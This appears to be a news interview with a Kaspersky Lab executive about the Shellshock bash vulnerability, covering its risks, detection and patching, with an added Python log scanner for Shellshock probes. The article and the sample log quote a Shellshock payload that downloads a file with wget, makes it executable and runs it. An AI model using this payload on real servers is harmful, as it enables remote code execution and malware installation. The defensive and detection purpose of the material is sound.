As we are aware, Shellshock and Bash Bug are two names for one and the same vulnerability.
Mr. Altaf Halde, Managing Director, Kaspersky Lab – South Asia, has answered some of the critical questions that have come up because of this bug.
Is there threat to online banking?
This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop.
Proof-of-concept code targeting *nix workstation DHCP clients has been released, but most workstation DHCP process policies prevent actions from this sort of exploit by default.
Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.
How serious is the threat?
This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc.
So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.
Is it the new Heartbleed?
Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting. By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.
Can it be used in future APT attacks?
It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.
Can I detect if someone has exploited this against me?
We would recommend reviewing your HTTP logs and checking whether there is anything suspicious. An example of a malicious pattern:
192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"
There are also some patches for bash that log every command that is passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attacker's actions on the system.
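The log review described above can be automated. The following Python scanner is an added example, not code from the interview or from Kaspersky Lab: it parses common-log-format lines and flags any line carrying the "() { ... };" function-definition prefix that Shellshock probes inject into HTTP headers. The sample log lines are constructed for the example (the first one is the pattern quoted above); the regexes and function names are the example's own.

```python
import re
from typing import Dict, List

# Shellshock probes embed a bash function definition, "() { :; };", in a header
# that a CGI handler copies into an environment variable. Whitespace and the
# function body vary between scanners, so match loosely on the "() {" prefix
# and capture whatever follows the closing "};" as the injected command.
# Note: this catches raw header values only; URL-encoded variants in the
# request path would need decoding first.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;(?P<cmd>[^"]*)')

# Common log format: client ident user [time] "request" status bytes, followed
# by any number of quoted fields (referer, user-agent, ...) kept in "rest".
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)(?P<rest>.*)$'
)

def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into its fields; {} if it is not a log line."""
    m = CLF_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else {}

def detect_shellshock(line: str) -> Dict[str, str]:
    """Return details of a Shellshock probe in one log line, or {} if none."""
    fields = parse_line(line)
    if not fields:
        return {}
    m = SHELLSHOCK_RE.search(line)
    if not m:
        return {}
    return {"client": fields["client"], "time": fields["time"],
            "request": fields["request"], "status": fields["status"],
            "command": m.group("cmd").strip()}

def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over every line and keep only the hits."""
    return [hit for hit in (detect_shellshock(l) for l in lines) if hit]

# Constructed sample log: one probe from the article, one benign request,
# one probe hidden in the User-Agent field, and one line that is not a log entry.
SAMPLE_LOG = [
    '192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 '
    '"() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"',
    '10.0.0.7 - - [25/Sep/2014:14:01:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [25/Sep/2014:14:02:30 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { ignored; }; echo vulnerable"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["request"]!r} -> {hit["command"]}')
```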
Advice on how to fix this problem
The first thing that you need to do is to update your bash version. Different Linux distributions are offering patches for this vulnerability, and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.
If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.
Also review your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.
The opinions expressed in this article are those of the author and do not necessarily reflect the views of our organisation.
© 2024 Hyderabad Media House Limited/The Hans India. All rights reserved.